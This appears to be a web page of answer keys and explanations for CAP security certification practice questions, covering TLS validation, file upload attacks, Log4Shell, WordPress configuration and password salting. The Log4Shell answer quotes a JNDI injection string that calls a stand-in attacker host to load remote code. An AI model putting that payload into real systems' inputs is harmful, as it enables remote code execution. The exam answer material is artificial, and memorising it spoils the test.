Get The SecOps Group CAP Exam Practice Questions - Real and Updated

Answer : B

TLS (Transport Layer Security) certificates are validated by browsers to ensure secure communication. Browsers maintain a trusted store of public keys from known Certifying Authorities (CAs), which are used to verify the digital signature of a TLS certificate presented by a server. This process involves checking the certificate's signature against the CA's public key to confirm its authenticity and validity. If the signature matches and other criteria (e.g., expiration, revocation) are met, the certificate is deemed valid.

Option A ('The browser contains the private key...'): Incorrect, as browsers do not contain private keys of CAs; private keys are kept secret by the CAs themselves.

Option B ('The browser contains the public key...'): Correct, as browsers use CA public keys to validate certificates, enabling differentiation between valid and invalid TLS certificates.

Option C ('The browser contains both the public and private key...'): Incorrect, as browsers only store public keys, not private keys, for security reasons.

Option D ('The browser does not have any mechanism...'): Incorrect, as browsers have robust mechanisms (via CA public keys) to validate TLS certificates.

The correct answer is B, aligning with the CAP syllabus under 'Secure Communication' and 'TLS Configuration.'

Answer : C

The screenshot shows an HTTP POST request to /upload.php with a multipart/form-data payload, where the attacker uploads a file named malicious.php disguised as an image/jpeg but containing PHP code (<?php phpinfo(); ?>). This indicates an attempt to exploit a File Upload Vulnerability. Such vulnerabilities occur when an application allows users to upload files without proper validation or sanitization, enabling attackers to upload malicious scripts (e.g., PHP) that can be executed on the server. In this case, if the server executes the uploaded malicious.php, it could expose server information via phpinfo() or perform other malicious actions.

Option A ('HTTP Desync Attack') involves manipulating HTTP request pipelines, which is not relevant here as the request appears standard. Option B ('File Path Traversal Attack') involves accessing unauthorized files using ../, which is not evident in this request. Option D ('Server-Side Request Forgery') involves tricking the server into making unintended requests, which does not apply to file uploads. Thus, C is the correct answer, aligning with the CAP syllabus under 'File Handling Security' and 'OWASP Top 10 (A05:2021 - Security Misconfiguration).'

Answer : B

The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.

Answer : D

In WordPress, the file that stores database connection details, including the database name, username, password, and host, is wp-config.php. This file is located in the root directory of a WordPress installation and is critical for configuring the connection to the MySQL database. It contains constants like DB_NAME, DB_USER, DB_PASSWORD, and DB_HOST, which must be protected from unauthorized access to prevent database compromise.

Option A ('wp-configuration.php'): A common misspelling; the correct file name lacks the extra 'ation.'

Option B ('wp-conf.php'): This is not a valid WordPress file name.

Option C ('wp-secret.php'): This is not a standard WordPress file.

Option D ('wp-config.php'): The correct and official file name used by WordPress.

The correct answer is D, aligning with the CAP syllabus under 'Configuration Management' and 'Application Security.'

Answer : A

Salting is a security technique used in password hashing to enhance protection against specific types of attacks. A salt is a random value added to a password before hashing, ensuring that even if two users have the same password, their hashed outputs will differ. The primary objective of salting is to defend against dictionary attacks and rainbow table attacks. Dictionary attacks involve trying common passwords from a precomputed list, while rainbow table attacks use precomputed tables of hash values to reverse-engineer passwords quickly. By adding a unique salt to each password, the hash becomes unique, rendering precomputed rainbow tables ineffective, as an attacker would need to generate a new table for each salt, which is computationally impractical.

Option B ('To slow down the hash calculation process') is incorrect because while techniques like key stretching (e.g., using PBKDF2 or bcrypt) intentionally slow hashing to counter brute-force attacks, salting itself does not primarily aim to slow the process---it focuses on uniqueness. Option C ('To generate a long password hash that is difficult to crack') is a byproduct of salting but not the primary objective; the length and difficulty come from the hash function and salt combination, not salting alone. Option D ('To add a secret message to the password hash') is incorrect, as a salt is not a secret message but a random value, often stored alongside the hash. This aligns with best practices in authentication security, a key component of the CAP syllabus.